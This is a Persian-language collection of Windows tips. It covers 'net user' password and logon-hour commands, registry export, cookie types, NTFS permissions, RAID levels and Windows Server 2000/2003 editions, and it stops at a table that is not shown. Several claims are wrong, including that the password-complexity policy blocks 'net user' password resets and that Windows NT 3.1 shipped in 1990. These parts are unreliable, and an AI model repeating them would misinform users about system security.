کسانی که با دستورات net اشنايی دارند حتما بر اين موضوع واقفند که اين دستور از قابلیت های بسیاری برخوردار است به طوری که با این دستور می توان کلمه عبور را بدون داشتن رمز قبلی تغییر داد.

برای این که نتواند کسی کلمه عبور شما را از این طریق تغییر دهد می توانید از طريق گزينه زير وارد شده

Control Panel/Performance and Maintenance/Administrative Tools/Local Security Policy/Account Policies/Password Polici/Password must meet complexity requirements

و این گزینه که به طور پیش فرض غیر فعال است را فعال نمایید.به اين ترتيب ديگر کسی نمی تواند از طريق Cmd کلمه عبور شما را عوض نمايد.(قابل توجه اقای x که password خودش رو عوض کرد و انداخت تقصير يکی ديگه).

تنظیم ساعت کار ویندوز با Cmd:

برای این کهwindows  شما در ساعاتی مشخص از هفته قابل استفاده باشد و در ساعات دیگر کسی نتواند از ان استفاده نماید می توانید از دستور زیر استفاده کنید.

,.,[Net user [username] /time:[day,start time[am|pm]-end time[am|pm

به عنوان مثال این دستورات       ;net user home /time:f,10am-10pm;w,5am-7am

کاربری با نام  home    را در ر روزهای جمعه از ساعت 10 صبح تا 10 شب و روز های جهارشنبه از ساعت 5 صبح تا 7 صبح فعال می کند.

لازم به ذکر است که غیر فعال بودن ان به اين معنی است که نام انهادر Welcome screen ظاهر میگردد اگر ساعات ان غیر مجاز باشد کادر پسورد میاید که هیچ کس از ان اطلاعی ندارد در غیر این صورت وارد ان میشود.

همچنین روزهای هفته باید به صورت زیر در فرمان ظاهر گردند   جمعه f, شنبه  sa    , یکشنبه su  , دوشنبه   m  ,سه شنبه  t   ,چهار شنبه  w , پنج شنبه  th.

برای باز گرداندن به حالت اولیه میتوانید از دستور زیر استفاده کنید

Net user [username] /time:all

که به جای  user name باید نام کابری خود را وارد کنید.

طريقه گرفتن Export از شاخه های رجيستری توسط Cmd :

برای اين کار ميتوانيد از دستور زير استفاده کنيد.      reg export KeyName FileName

به جای KeyName نام شاخه ای که می خواهيد از ان Export  تهيه کنيد را بنويسيد و به جای  FileName مسير و نام فايل را قرار می دهيد.

به عنوان مثال دستورات زير از شاخه

[HKEY_CURRENT_USER\Software\Microsoft\winmine]

فايلی با نام min.reg در درايو: D  می سازد.

reg export "hkcu\software\microsoft\winmine" d:\min.reg

همچنين به جای شاخه های اصلی بايد معادل های ان را به کار برد.

HKEY_CLASSES_ROOT]     :   hkcr]
HKEY_CURRENT_USER]     :   hkcu]
HKEY_LOCAL_MACHINE]   :   hklm]
HKEY_USERS]                   :   hku]
HKEY_CURRENT_CONFIG] :   hkcc]

همچنين ميتوانيد عمليات reg copy , reg delete , غيره را بر روی رجيستری انجام دهيد.برای اطلاعات بيشتر به Help ويندوز مراجعه کنيد.

انواع مختلفی از کوکی ها وجود دارد و شما در نسخه های جدیدتر وب بروسر ها (Web Browsers) این امکان را دارید که انتخاب کنید کدام کوکی ها برروی کامپیوتر شما ذخیره شوند در صورتی که کوکی ها را کاملا غیر فعال کنید ممکن است بعضی سایت های اینترنتی را نتوانید ببیند و یا از بعضی امکانات مثل به یاد داشتن شناسه و رمز عبور شما در آن سایت محروم شوید و یا انتخاب هایی که داشتید مثل ساعت محلی و یا دمای هوای محلی و کلا از تنظیمات شخصی ای که در آن وب سایت انجام داده اید نتوانید استفاده کنید.
کوکی ها چگونه مورد استفاده قرار می گیرند؟
همانطوری که گفتیم کوکی یک فایل است که توسط یک وب سایت برای حفظ اطلاعات بر روی کامپیوتر شما قرار می گیرد یک کوکی می تواند شامل اطلاعاتی باشد که ...

شما در آن سایت وارد کرده اید مانند ای میل - آدرس - شماره تلفن و سایر اطلاعات شخصی - همچنین کوکی ها می توانند صفحات و یا کارهایی را که در آن وب سایت انجام داده اید مثل تعداد کلیک لینک های بازدید شده و مدت بازدیدرا نیز ضبط کنند. این به سایت کمک می کند تا دفعه بعد که به آن سایت بازگشتید اطلاعات شما را به خاطر داشته باشد و از وارد کردن تکراری اطلاعات خودداری کنید نمونه بارز این مطلب لاگ این ماندن شما در آن سایت است و یا پیغام های Welcome Back و یا حفظ تنظیماتی که درآن سایت انجام داده این به عنوان مثال می توان به خصوصی کردن صفحه My MSN اشاره کرد. نکته ای را که باید به خاطر داشته باشید این است که هر وب سایت فقط می تواند از اطلاعاتی که شما وارد کرده اید استفاده کند نه بیشتر مثلا اگر ای میل خود را در آن سایت وارد نکرده اید آن وب سایت نمی تواند ای میل شما را به دست آورد و یا به سایر اطلاعات کامپیوتر شما دست یابد . مورد دیگر اینکه وب سایت ها فقط می توانند کوکی هایی را که خود ایجاد کرده اند بخوانند و نمی توانند از سایر کوکی های موجود استفاده کنند. وقتی که از یک وب سایت برای بار دوم بازدید می کنید آن وب سایت به دنبال کوکی مربوط به خود می گرد و در صورت وجود از آن استفاده می کند.( البته باز هم با توجه به تنظیماتی که انجام داده اید )
انواع کوکی ها:
کوکی های پایا - دائمی (presistent Cookies):
این نوع کوکی ها به عنوان یک فایل بر روی کامپیوتر شما ذخیره می شوند و بعد از بستن مرورگر اینترنتی شما پاک نخواهند شد و همچنان باقی می مانند. این کوکی ها قابلیت به روز شدن توسط سایت ایجاد کننده خود را دارند همچنین سایت اجازه دسترسی مستقیم به این کوکی ها رو نیز دارد حدود 80 درصد کوکی های مورد استفاده از این نوع هستند.
کوکی های موقت (Temporary Cookies):
کوکی هایی هستند که بعد از بستن مرورگر اینترنتی شما و یا خروج از سایت استفاده کننده از کوکی پاک می شوند.
نوع دیگر کوکی های موقت کوکی های زمان دار هستند که زمانی برای کار دارند و بعد از آن اصطلاحا Expire می شوند و از کار می افتند ولی پاک نمی شوند و در صورت بازدید مجدد از سایت ممکن است به روز رسانی شوند و مجددا مورد استفاده قرار بگیرند.
کوکی های ناخوشایند؟* (Unsatisfactory cookies)
این کوکی ها اجازه دسترسی به اطلاعات خصوصی شما را برای استفاده دویاره بدون پرسیدن از شما دارند از این کوکی ها بیشتر در خرید های اینترنتی و سایت امن (SSL*) مورد استفاده قرار می گیرند.
مقایسه کوکی های متعلق به سایت اصلی (First Party) و کوکی های متعلق به سایت های دیگر (Third Party)
دوستان قبل از هر چیز اجازه بدین با دو مفهوم First& third party اشنا شویم این مفاهیم در حقیقت مفاهیم بیمه ای هستند :
First Party: عضو اصلی یک خانواده و یا شرکت صاحب حقوق و مزایای اصلی کسی که بیمه نامه اصلی را داراست (Policy Holder)
Second party : شرکت بیمه کننده
Third Party : هر شخص سومی غیر از این دو کلا بقیه افراد
و اما این مفاهیم در کوکی ها چه معنایی می دهند؟
First Party : کوکی هایی هستند که فقط اطلاعات آنها به سایت که توسط آنها ایجاد شده اند فرستاده می شود و کار آنها همانطور که اشاره شد یادآوری اطلاعات ماست.
Third Party : کوکی هایی هستند که اطلاعات را به چندین سایت مختلف غیر از آنچه بازدید می کنید می فرستند استفاده این کوکی ها معمولا تجاری است بدینگونه که شما از سایتی بازدید می کنید و آن سایت دارای بنرهای تجاری و تبلیغات از سایت دیگری (Third Party) می باشد در اینجاست که کوکی Third Party وارد عمل شده و اطلاعات شما را ثبت می کند به عنوان مثال صاحب تبلیغ با استفاده از این امکان می تواند ببیند که شما چه نوع تبلیغ هایی را بازدید می کنید و در کدام سایت ها. این نوع کوکی هم می توانند از نوع دائمی و هم موقت باشند. اصولا این نوع کوکی ها استاندارد نیستند و توسط مرورگرهای جدید بلوک می شوند. همچنین این کوکی ها ممکن است به هکر ها کمک کنند تا اطلاعات شخصی شما را بدست بیاورند.( برای جلوگیری از آخرین پچ های مرورگر خود استفاده کنید*) اصولا پیشنهاد می شود تا این کوکی ها را که هیچ استفاده مفیدی برای کاربر ندارند بلوک کنید.

حتما تا كنون با عناويني همچون FAT16  و FAT32 آشنا هستيد . اين دو از سيستم  هاي فايلي مايكروسافت هستند كه در حال حاضر با توجه به گسترش زمينه هاي مختلف سيستم هاي كامپيوتري ناكارآمد و غير قابل اطمينان هستند .
يكي از مهمترين مشكلات امنيتي در سيستم FAT16  و FAT32 عدم توانايي در تعريف سطوح مجوز دسترسي به فايل ها و يا پوشه ها مي باشد . كه اين امر مي تواند به عنوان يكي از دلايل ناكارآمدي و قابل اطمينان نبودن اين سيستم ها در سطوح شبكه باشد .
بر اين اساس مايكروسافت سيستم فايلي جديدي تحت عنوان NTFS را ايجاد نمود كه از يك ساختار 64 بيتي پشتيباني مي كند و از اين رو كاربران مي توانند فايل هايي ايجاد كنند كه طول نام آنها تا 256 كاركتر باشد .
چهار مجوز استاندارد در سيستم NTFS براي فايل ها و پوشه ها وجود دارند :

1- No Access:   با انتخاب اين گزينه كاربران هيچگونه مجوزي براي خواندن ، نوشتن و ... فايل يا پوشه مربوطه نواهند داشت .

2- Read : با توجه به آنكه اجزاه خواندن يك فايل شامل اجراي آن نيز مي باشد ،از اين رو كاربري كه اين سطوح از دسترسي را داشته باشد مي تواند فايل را اجرا كرده و آن را بخواند .

3- Change :  اين سطح  دسترسي و مجوز ، كاربر را قادر مي كند تا فايل را خوانده و در صورت لزوم تغييرات خود را در آن انجام دهد يا حني فايل را حذف كند .

4- Full Control : با فعال بودن اين گزينه كاربران داراي مجوز مي توانند فايل را خواند ، تغييرات مورد نياز را درآن ايجاد كرده و يا حذف كنند . در واقع تمام امكانات و اختياراتي كه كاربر در حالت Change دارد در اين قسمت نيز وجود دارد و فرق اين دو سطح مجوز در آن است كه با داشتن مجوز Full Controll  ، كاربر مي تواند حتي براي ساير كاربران سيستم دسترسي تعريف كند و يا دسترسي كاربر ديگر را از آن پوشه و يا فايل حذف كند .

از لحاظ امنيتي بهتر است حتي الامكان از اين مجوز استفاده نكنيد ، زيرا داشتن مجوز Change بالاترين سطح دسترسي را به كاربران مي دهد مگر آنكه واقعا بخواهيد كاربري امكان تعريف يا حذف مجوز براي سايرين را داشته باشد .

البته مجوزه هاي ديگري نيز چون Read Only ، No Execute، Execute Only ، Write Only و ... نيز قابل تعريف مي باشند .

تعيين مجوز براي  منابع اشتراكي شبكه

مجوزهاي بررسي شده در فوق در واقع براي تعيين سطح دسترسي كاربراني است كه از يك سيستم بطور مشترك استفاده مي كنند . اما ممكن است سيستم شما در بين چندين سيستم ديگر و در يك شبكه قرار گرفته باشد و شما بخواهيد با تعيين سطح دسترسي هاي مشخص امكان دسترسي به يك يا چند كاربر بدهيد . پس از تعريف منابع اشتاركي در سيستم تان كه مي تواند فايل ها ، پوشه ها ، درايو ها ، چاپگر ، اسكنر و ... باشد ، كاربران داراي مجوز مي توانند به اين منابع دسترسي داشته باشند .

با توجه به آنچه گذشت مي توان سطوح دسترسي كاربران در سطح شبكه را نيز به شكل زير تعريف كرد :

1- No Access:   نازلترين سطح دسترسي (دسترسي وجود ندارد)

2- Read : اجرا و خواندن

3- Change : اجرا ، خواندن و اعمال تغييرات

4- Full Control : اجرا ، خواندن ، نوشتن و اعمال تغييرات ، تغيير در سطح مجوز ها

با توجه به اين توانايي ها شما مي توانيد براي  يك فايل و يا پوشه در هر دو وضعيت سيستم محلي و شبكه ، مجوزلازم را به كاربران بدهيد .

مثلا با تعيين مجوز Change براي يك فايل در سيستم محلي ، به كاربراني كه در پشت سيستم شما مي نشينند امكان اعمال تغييرات را در فايل بدهيد و با تعيين مجوز Read در سطح شبكه تنها امكان خواندن را به كاربراني كه از شبكه استفاده مي كنند بدهيد .

البته در صورت جابجايي اين سطوح ، يعني تعيين مجوز Change, در سطح شبكه و Read در سطح سيستم محلي  ، تنها مجوز Read كه حداقل سطح دسترسي  بين اين دو است به كاربران داده مي شود و كاربران شبكه نيز تنها مي توانند فايل را خوانده و اجرا كنند .

ويندوز XP ميتواند از سه فايل سيستم FAT16, FAT32 و NTFS استفاده کند. پاره ای از قابليت های ملموس و جالب NTFS به شرح زير است:
امنيت
FAT16 و FAT32 مطلقاً دارای هيچ گونه امنيت برای دسترسی به فايلها و پوشه های محلی نيستند و هر کاربری ميتواند با ورود به سيستم به کليه اطلاعات دسترسی داشته باشد درحاليکه NTFS اين امکان را به ما ميدهد تا برای دسترسی به فايلها و پوشه ها سطح دسترسی تعريف کنيم و از دسترسی افراد غير مجاز به اطلاعات از طريق محلی جلوگيری کنيم.
Recycle Bin جداگانه
در FAT16 و FAT32 هر آنچه که کاربرها حذف ميکنند در يک Recycle Bin مشترک قرار ميگيرد بدون در نظر گرفتن کاربر. ولی در NTFS کليه کاربرها دارای يک Recycle Bin مستقل هستند که باعث ميشود ديگر کاربرها به فايلها حذف شده کاربران ديگر دسترسی نداشته باشند.
Encryption
با NTFS اين امکان به شما داده ميشود تا فايلها و پوشه های خود را کد کنيد تا از دسترسی غير مجاز جلوگيری شود حتی اگر سطح دسترسی تعيین نشده باشد.
قالبيت بازيافت
NTFS اين قابليت را دارد تا فايلها را در هنگام بروز خطای فايل سيستم بازيافت نمايد. NTFS يک سری سکتورهای يدکی در نظر ميگيرد تا هنگام خرابی اطلاعات را به Cluster های سالم انتقال دهد و Cluster خراب را جهت جلوگيری از استفاده مجدد نشانه گذاری کند.
فشرده سازی
NTFS اين قابليت را به ويندوز اضافه ميکند که بدون نياز به نصب برنامه جانبی بتوانيد فايلها و پوشه ها را فشرده سازيد.
جيره بندی ديسک (Disk Quota)
با اين گزينه ميتوانيد فضای ديسک را بين کاربران جيره بندی کنيد تا هر کاربر نتواند بيشتر از آن حجمی که مجاز است از ديسک استفاده کند. اين قابليت در سيستم هايی که در آنها با محدوديت حجم مواجهيم بسيار موثر است.
اگر فکر ميکنيد اين گزينه های برای شما جذابيت کافی را دارند تا درايوهای خود را به NTFS تغيير دهيد ميتوانيد از دستور convert در خط فرمان برای تبديل درايوها به NTFS استفاده کنيد:

Convert x: /fs:ntfs

در اين دستور x را با نام درايو جايگزين کنيد.
توجه : همه سيستم عاملها قادر به خواندن درايوهای NTFS نيستند و بايد قبل از تبديل به اين مساله توجه داشته باشيد. اگر از ويندوز 98 بر روی سيستمتان استفاده ميکنيد به هيچ وجه اين تبديل را انجام ندهيد مگر با مطالعه دقیق.

RAID کوتاه شده عبارت Redundant Array of Inexpensive Disks ميباشد و کار آن ايجاد يک واحد از مجموع چند هارد ديسک ميباشد. در واقع با قرار دادن چند هارد ديسک در کنار هم و پياده سازی RAID همه هارد ديسکهای ما به يک واحد تبديل ميشوند و سيستم همه آنها را فقط به عنوان يک منبع واحد ميبيند که بسته به اينکه چه سطحی از RAID پياده سازی شده باشد ميتواند باعث افزايش کارايی و يا امنيت اطلاعات و يا تلفيقی از اين دو شود.
پياده سازی RAID همچون بسياری ديگر از تکنولوژی ها هم بصورت سخت افزاری و هم نرم افزاری امکان پذير است که مسلماً مدل سخت افزاری دارای سرعت و پايداری بيشتری است و مدل نرم افزاری فقط در شرايطی پيشنهاد ميشود که با کمبود امکانات و بودجه مواجه هستيم و يا اينکه قرار است بر روی يک سيستم پشتيبان و نه مادر پياده سازی شود.
هميشه با اين مساله مخالف بوده ام که سيستمی را که در آن از تکنولوژی RAID استفاده نشده است را يک سرويس دهنده بنامم و به همين دليل هميشه سعی کردم مشتری را به پياده سازی حداقل، که همانا پياده سازی RAID به روش نرم افزاری است قانع کنم. خوشبختانه همزمان با گسترش فرهنگ استفاده از سيستمها در بين مديران و صاحبان مشاغل و اهميت اطلاعات و حفظ آن برای اين گروه، هزينه پياده سازی RAID به کمک پيشرفت تکنولوژی روز به روز ارزانتر ميشود و هم اکنون با توسعه بيش از پيش اين تکنولوژی و کشيده شدن آن به دايره ديسکهای با تکنولوژی ATA حتی شاهد درخواست پياده سازی اين تکنولوژی بر روی سيستمهای روميزی هستيم!
اما فارغ از اينکه RAID بصورت نرم افزاری و يا سخت افزاری پياده سازی ميشود و يا نياز ما استفاده از هارد ديسکهای SCSI و يا ATA است، تکنولوژی RAID دارای سطوح گوناگون است که در پايين به ذکر عمده ترين آنها ميپردازم:
RAID-0
در اين مدل حداقل به دو ديسک نياز است و حداقل اتلاف فضا را به همراه حداکثر اجرا در خواندن و نوشتن اطلاعات دارا ميباشد ولی در عين حال دارای افزونگی (Redundancy) نميباشد که باعث ميشود در اغلب سناريوها از اين مدل در کنار RADI-1 استفاده شود

RAID-1
اين مدل فقط و فقط بر روی دو هارد ديسک قابل پياده سازی است و ارزانترين مدل RAID است که دارای افزونگی است. از اين مدل به نام Mirroring ياد ميشود و در واقع با پياده سازی اين مدل اطلاعات ما همزمان بر روی دو ديسک نوشته ميشوند که در نتيجه سرعت نوشتن را در جهت منفی تحت تاثير قرار ميدهد ولی از طرفی سرعت خواندن اطلاعات افزايش ميابد. در اين مدل چنانچه يکی از دو هارد ديسک به دلايلی دچار مشکل و خرابی شود اطلاعات هيج صدمه ای نخواهند ديد و سيستم به فعاليت عادی خود ادامه خواهد داد. نکته منفی اين سطح از RAID ميزان فضای قابل استفاده است که فقط معادل هارد ديسک با فضای کمتر استفاده شده ميباشد. بعنوان مثال اگر از دو هارد ديسک 30 و 40 گيگابايتی استفاده کرده ايد، فضای قابل استفاده برای ذخيره سازی اطلاعات معادل 30 گيگابايت ميباشد.

RAID-5
اين سطح از RAID حداقل نياز به سه ديسک سخت خواهد داشت و استفاده از آن بسيار متداول است. در اين سطح اتلاف فضا تقريباً 20 تا 30 درصد کل فضای استفاده  شده ميباشد و دارای انعطاف پذيری جهت افزودن ديسک های اضافی ميباشد.  اطلاعات به قطعات کوچکی شکسته شده و بر روی همه ديسکها پخش ميشود و يک Parity هم جهت بازيابی اطلاعات در صورت بروز مشکل برای هر يک از ديسکها بصورت چرخشی بر روی يکی از ديسکها نوشته ميشود.

در صورت تمايل ميتوانيد با مراجعه به وبسايتهای زير اطلاعات بيشتر و دقيقتری از اين تکنولوژی کسب کنيد:
http://www.adaptec.com
http://www.mylex.com
http://www.promise.com

ماکروسافت و سيستم عامل ويندوز دارای يک تاريخچه طولانی می باشند . ويندوز در ابتدا بعنوان يک محيط گرافيکی عملياتی ارائه گرديد . مهمترين ويژگی ويندوز در آن دوران ، ارائه پتانسيل ها ی لازم بهمراه انعطاف مناسب در مقايسه با سيستم عامل MS-DOS ، بود . ويندوز ، بسرعت رشد و درادامه نسخه های متفاوتی از آن در اختيار کاربران قرار گرفت . ماکروسافت ، اولين نسخه مبتنی بر سرويس دهنده ويندوز را در سال 1990 و با نام Windows NT 3.1 ؛ ارائه نمود. بتدريج و طی ساليان بعد ( تقريبا" هر دو سال يک نسخه ) ، نسخه های متفاوتی از ويندوز عرضه گرديد . در حال حاضر ما شاهد نسخه های متفاوت سرويس دهنده 2000 ويندوز و نسخه های بعد از آنان يعنی خانواده سرويس دهنده Windows .NET ، می باشيم .
در طی ساليان گذشته ، ماکروسافت نسخه های متفاوتی از سيستم های عامل سرويس دهنده را بمنظور تامين نياز های کاربران طراحی و ارائه نموده است . اولين نسخه جديد در اين رابطه به معرفی نسخه Windows NT Server 4.0 ( نسخه Enterprise ) بر می گردد . بدعت ماکروسافت در ارائه ويرايش های متفاوت برای محيط های خاص ادامه يافت و وهمانگونه که می دانيد در ويندوز 2000 ، ما شاهد ارائه سه نسخه متفاوت ( نسخه سرويس دهنده ) و در Windows .NET Server 2003 ، ما شاهد ارائه چهار نسخه متفاوت در اين زمينه می باشيم . شناخت پتانسيل های هر نسخه بهمراه تفاوت موجود بين هريک از آنان ، در زمان طراحی و بکارگيری هر محيطی که از سرويس دهندگان NET Enterprise. ، استفاده می کند ، بسيار حائز اهميت خواهد بود. سرويس دهندگان NET Enterprise . ، که تعداد آنان به ده می رسد ، مسئول ارائه سرويس های اساسی در محيط های مبتنی بر ويندوز می باشند . هر يک از نسخه های ويندوز 2000 و NET Server . ، مجموعه ای از تکنولوژی های اساسی را ارائه داده که سرويس دهندگان NET Enterprise ، با آنان مرتبط خواهند شد ( از خدمات آنان بنوعی استفاده و خود مظهر يک سرويس و خدمات جديد برای کاربران خواهند بود) . در اين راستا لازم است که در ابتدا با ماهيت و توانائی های هر يک از نسخه های ويندوز که بنوعی زيربناء اوليه را برای سرويس دهندگان NET Enterprise . ، ارائه می دهند آشنا و در مرحله بعد با سرويس ها و تکنولوژی های اساسی ارائه شده توسط سسيتم عامل ويندوز ( نسخه های سرويس دهنده 2000 , 2003 ) نيز آشنا و در نهايت نحوه استفاده و ارتباط سرويس دهندگان NET Enterprise. با پتانسيل های ارائه شده توسط ويندوز را مورد مطالعه و بررسی قرار دهيم . در اولين بخش از مقالات فوق ، به بررسی توانائی و تفاوت بين هر يک از نسخه های ويندوز ( خانواده سرويس دهندگان 2000 و خانواده NET Server 2003 . ) ، خواهيم پرداخت .
خانواده Windows 2000 Server
سرويس دهندگان NET Enterprise . ، بر خلاف نام خود که ممکن است اين تصور را ايجاد نمايند که صرفا" نيازمند استفاده از Windows .NET Server 2003 می باشند ، می توانند بر روی خانواده بزرگ Windows 2000 Server اجراء گردند. لازم به يادآوری است که برخی از سرويس دهندگان NET Enterprise . ، نظير Exchange Server 2000 ، بر روی نسخه های Windows .NET Server 2003 ، اجراء نخواهند شد. برخی از سرويس دهندگان موجود NET Enterprise . ، همچنان بر روی نسخه ويندوز NT server 4.0 اجراء می گردند ، اين نوع سرويس دهندگان دارای ويرايش های خاصی می باشند که امکان استفاده از Active Directory را برای آنان فراهم می نمايد . تعداد نرم افزارها و محصولاتی که می توان آنها را بر روی Windows NT اجراء نمود ، بتدريج به سمت صفر ميل خواهد کرد. در اين مقاله فرض می شود که شما حداقل از نسخه Windows 2000 Server ، استفاده می نمائيد.

ويندوز 2000 دارای سه نسخه متفاوت سرويس دهنده است . تعداد نسخه های فوق را می توان از لحاظ فنی به چهار نسخه نيز تعميم داد .( در صورتيکه سيستم عامل سرويس گيرنده Windows 2000 Professional را نيز در نظر بگيريم ) . هر نسخه بمنظور اهدافی خاص طراحی و دارای مجموعه ای ازپتانسيل ها و قابليت های مختص بخود است . سه نسخه متفاوت سرويس دهنده 2000 ، بشرح زير می باشند :

• نسخه استاندارد سرويس دهنده 2000 ، " Windows 2000 Server " ، ناميده می شود. نسخه فوق ، نسخه پايه سيستم عامل بوده و شامل تمامی قابليت ها و پتانسيل های لازم و مورد نياز سرويس دهندگان NET Enterprise . ، است . هر کامپيوتر مبتنی بر سيستم عامل Windows 2000 Server دارای ويژگی هائی نظير : يک کنترل کننده Domain مربوط به Active Directory و سرويس های ارتباطی شبکه است . نسخه فوق ، دارای محدوديت های مختص بخود است . حمايت از حداکثر چهار پردازنده و چهار گيگا بايت حافطه اصلی (RAM) ، نمونه هائی از محدوديت های نسخه فوق ، می باشد . زمانيکه برنامه ها اجراء می گردند به آنها يک فضاء ثابت حافظه و بميزان دو گيگا بايت نسبت داده می شود . در صورتيکه کامپيوتر دارای حافظه فيزيکی کمتری باشد ، سيستم عامل از فضائی بر روی ديسک که Swap file و يا page file ناميده می شود برای ايجاد حافظه مجازی، استفاده می نمايد .
• نسخه دوم ، Windows 2000 Advanced Server است. اين نسخه، شامل تمامی ويژگی ها و پتانسيل های نسخه Windows 2000 Server بعلاوه امکانات اضافه ديگری است . نسخه فوق ، نيز دارای محدوديت های خاص خود است . حمايت از حداکثر هشت پردازنده و هشت گيگابايت حافظه ، نمونه هائی در اين زمينه می باشند . اين نسخه ، تغييراتی را درارتباط با مدل حافظه استفاده شده توسط برنامه ها، ايجاد نموده است . در اين راستا سه گيگابايت ارائه و صرفا" از يک گيگا بايت برای سيستم عامل ، استفاده می شود . بدين ترتيب ، برنامه های بزرگی نظير SQL Serevr ، از مزايای حافظه RAM بخوبی بهره مند خواهند شد . نسخه فوق ، همچنين دارای امکاناتی نظير : کلاسترينگ (Clustering ) و Network Load Balancing Service ، است . با اينکه اکثر سرويس دهندگان NET Enterprise . ، بصورت نسخه Enterprise Edition در دسترس می باشند ، ولی اين بدين مفهوم نيست که آنان نيازمند استفاده از نسخه Advanced Server می باشند . مثلا" Exchange Sever Enterprise Edition ، قادر به اجراء بر روی Windows 2000 Server است ( در چنين حالتی ، نمی توان از امکان کلاسترينگ Exchange استفاده گردد ، مگر اينکه آن را بر روی نسخه Advanced Server نصب نمود ) .
• نسخه جامع و بسيار بزرگ ويندوز 2000 ، Windows 2000 Datacenter Server ناميده می شود. اين نسخه حداکثر شصت و چهار گيگابايت حافظه اصلی (RAM) و سی و دو پردازنده را حمايت می نمايد. نسخه فوق دارای تمامی قابليت های کلاسترينگ نسخه Advanced Server و ساير پتانسيل های استاندارد می باشد. از نسخه فوق ،در محيط هائی با قابليت های محاسباتی و عملياتی بسيار بالا، استفاده می گردد . علاوه بر آمار شگفت انگيز نسخه فوق در رابطه با ميزان حافظه و تعداد پردازنده ، ماکروسافت ادعا نموده است که زمان مفيد ( Uptime ) سيستم عامل فوق ، 99.999 % است . در صورتيکه قصد تهيه اين نسخه ويندوز را داشته باشيد ( بصورت قانونی ! ) و بدنبال قيمت آن می باشيد ، هرگز در اين راه موفق نخواهيد شد. چون شما نمی توانيد نسخه ای از آن را خريداری نمائيد . ماکروسافت، صرفا" نسخه فوق را به توليد کنندگان سخت افزار سرويس دهنده ( معمولا" OEM ناميده شده و اقتباس شده از Original Equipment Manufactures است) عرضه می نمايد . شرکت های توليد کننده ، پيکربند های خاصی را در رابطه با سخت افزار سرويس دهنده انجام و بمنظور سازگاری با DataCenter Server آن را بررسی ، تست و در ادامه سرويس دهندگان فوق ، به شرکت های متقاضی بهمراه سيستم عامل Datacenter Server فروخته می گردد .
  سيستم و نحوه پشتيبانی Datacenter ، نسبت به ساير نسخه های ويندوز نيز متفاوت است . ماکروسافت حمايت فنی مستقيمی در رابطه با نسخه فوق را ارائه نمی دهد. در مقابل ، OEM ، کانال ارتباطی و پشتيبانی لازم را با مشتريان مربوطه ، برقرار خوادهد کرد. يکی از نکات مهم پشتيبانی Datacenter ، عدم مجاز بودن اعمال تغييرات و اصلاح پيکربندی سخت افزار سرويس دهنده ، بدون کسب مجوز لازم از OEM است .

خانواده Windows .NET Server 2003
Windows .NET Server 2003 ، آخرين نسخه های توليد شده در رابطه با محصولات ويندوز شرکت ماکروسافت ، بوده و نسخه بعدی خانواده Windows 2000 ، می باشند. تمام نسخه های Windows .NET Server 2003 ، شامل گزينه های رابط کاربرWindows XP و يا themes نمی باشند . اين بدين علت است که themes نيازمند منابع اضافه ای است و برای يک سرويس دهنده مناسب بنظر نمی رسد ، منابع را صرف انجام چنين عملياتی آنهم در رابطه با بخش رابط کاربر بر روی سرويس دهنده نمايد . بنابراين زمانيکه سيستم را با استفاده از ويندوز 2003 ، برای اولين مرتبه راه اندازی می نمائيد ، از اينترفيس آن تعجب نکنيد .( اينترفيس ويندوز 2000 را در مقابل اينترفيس جديد XP مشاهده ، خواهيد کرد) . خانواده Windows .NET Sever 2003 دارای چهار نسخه متفاوت است :

• Windows .NET Server 2003 ,Web Edition ، يک نسخه مناسب ، سريع و ارزان ! برای پلات فرم مبتنی بر سرويس دهنده وب است .
• Windows .NET Server 2003 ,Standard Edition ، که معادل Windows 2000 Server است .
• Windows .NET Server 2003 ,Enterprise Edition . که معادل Windows 2000 Advanced Sever است .
• Windows .NET Server 2003 ,Datacenter Edition . که معادل Windows 2000 Datacenter Server است .

ماکروسافت ، نام Windows .NET Server 2003 را دو مرتبه قبل از عرضه آن تغيير داده است . ( Windows 2002 به Windows .NET Server و سپس به Windows .NET Server 2003 ) . در ادامه ما همچنان از اسامی کوتاه نظير Windows .NET Standard Server نسبت به نام رسمی Windows .NET Server 2003 Standard Edition ، استفاده خواهيم کرد.

با معرفی Windows .NET Web Server 2003 ، ماکروسافت قانون ( بدعت ) مربوط به انتخاب يک نسخه بمنظور يک کار خاص را تغيير داده است . Windows .NET Standard Sever ، همچنان اولين گزينه برای اکثر برنامه ها است . Enterprise Server ، امکانات مناسبی را در رابطه با حافظه و کلاسترينگ ، اضافه نموده است .نسخه Datacenter همچنان در اختيار OEM گذاشته می شود(همانطور که دررابطه با ويندوز 2000 عمل می گرديد) . Windows .NET Web Server ، يک ايده جديد بوده و هدف آن رقابت در جهت ارائه يک سرويس دهنده وب با قيمت مناسب! با ساير توليدکنندگانی است که محصولات خود را نظير سيستم عامل و يا سرويس دهنده وب، بصورت رايگان در اختيار کاربران قرار می دهند ( لينوکس و Apache نمونه هائی در اين زمينه می باشند) . قطعا" رقابت با توليدکنندگانی که محصول خود را بصورت رايگان در اختيار قرار می دهند ، کار بيسار مشکلی ! بوده و می بايست برای آن تدابير خاصی انديشيده گردد . مثلا" قيمت 1,199 دلار برای هر نسخه از سرويس دهنده Windows 2000 Server ( شامل ده مجوز دستيابی کاربران ) ، يک قيمت رقابتی نمی باشد . Windows .NET Web Server ، بدنبال پرکردن اين خلاء رقابتی است . نسخه فوق در عين حاليکه برخی از ويژگی های ويندوز را ندارد ولی تمامی ويژگی ها و امکانات لازم و مورد نياز يک سرويس دهنده وب را بخوبی و با قيمت پائين ! ارائه می نمايد.
با اينکه تعدادی از سرويس دهندگان NET Enterprise . ، بصورت Enterprise Edition در دسترس می باشند ولی اين بدان مفهوم نيست که آنان به Enterprise Server نياز خواهند داشت . مثلا" SQL Server 2000 Enterprise Edition ، می تواند بر روی Windows .NET Standard Server ، نصب و اجراء گردد . در اين راستا امکان استفاده از SQL Server Clustering ، وجود نخواهد داشت ، مگر اينکه نسخه Windows .NET Enterprise Server ، نصب گردد .
Windows .NET Server ، نسخه های شصت و چهار بيتی خود را بمنظور حمايت از پردازنده جديد Itanium ، شرکت اينتل نيز ارائه نموده است . صرفا" نسخه های Enterprise و Datacenter بصورت 64 بيتی ، ارائه شده اند . کامپيوترهای Itanium که بر روی آنها Windows .NET Enterprise Server اجراء می گردد ، قادر به حمايت از شصت و چهار گيگابايت حافظه اصلی می باشند . بر روی کامپيوترهای فوق در صورتيکه نسخه Datacenter نصب شده باشد ، امکان استفاده از حداکثر 128 گيگابايت حافطه وجود خواهد داشت .
جدول زير تفاوت های موجود بين هر يک از نسخه های Windows .NET Server را نسان می دهد .

